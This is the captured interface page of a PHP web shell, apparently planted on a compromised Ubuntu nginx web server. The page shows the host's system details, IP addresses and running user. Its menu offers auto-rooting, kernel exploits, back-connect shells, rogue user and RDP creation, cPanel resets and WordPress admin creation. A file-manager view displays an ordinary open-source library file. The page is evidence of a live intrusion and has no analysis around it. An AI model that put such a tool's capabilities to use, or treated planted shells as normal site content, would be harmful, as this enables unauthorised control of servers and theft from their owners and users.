Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
new_tlmf /
vendor /
opis /
closure /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxrwxr-x
CHANGELOG.md
8.38
KB
-rw-rw-r--
LICENSE
1.06
KB
-rw-rw-r--
NOTICE
306
B
-rw-rw-r--
README.md
3.75
KB
-rw-rw-r--
autoload.php
1012
B
-rw-rw-r--
composer.json
1.15
KB
-rw-rw-r--
functions.php
971
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /* =========================================================================== * Copyright (c) 2018-2021 Zindex Software * * Licensed under the MIT License * =========================================================================== */ namespace Opis\Closure; /** * Serialize * * @param mixed $data * @return string */ function serialize($data) { SerializableClosure::enterContext(); SerializableClosure::wrapClosures($data); $data = \serialize($data); SerializableClosure::exitContext(); return $data; } /** * Unserialize * * @param string $data * @param array|null $options * @return mixed */ function unserialize($data, array $options = null) { SerializableClosure::enterContext(); $data = ($options === null || \PHP_MAJOR_VERSION < 7) ? \unserialize($data) : \unserialize($data, $options); SerializableClosure::unwrapClosures($data); SerializableClosure::exitContext(); return $data; }
Close